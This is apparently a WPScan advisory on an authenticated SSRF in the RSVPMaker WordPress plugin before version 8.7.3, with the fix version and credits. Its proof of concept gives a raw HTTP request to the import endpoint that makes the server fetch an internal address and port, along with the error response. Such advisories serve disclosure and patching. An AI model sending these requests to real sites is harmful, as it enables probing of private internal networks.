WordPress Plugin Vulnerabilities
RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF
Description
The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes an URL input and calls curl on it, without first validating it to ensure it's a remote one. As a result, a high privilege user could use that feature to scan the internal network via a SSRF attack.
Proof of Concept
Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import' POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1 Host: 172.28.128.50 Content-Length: 52 Accept: */* X-Requested-With: XMLHttpRequest X-WP-Nonce: b56e26b3f8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://172.28.128.50 Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen Accept-Language: en-US,en;q=0.9 Cookie: [admin cookies] Connection: close importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0 Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
Affects Plugins
Fixed in 8.7.3 References
Classification
Type
SSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-29 (about 2 years ago)
Added
2021-06-29 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)
WPScan 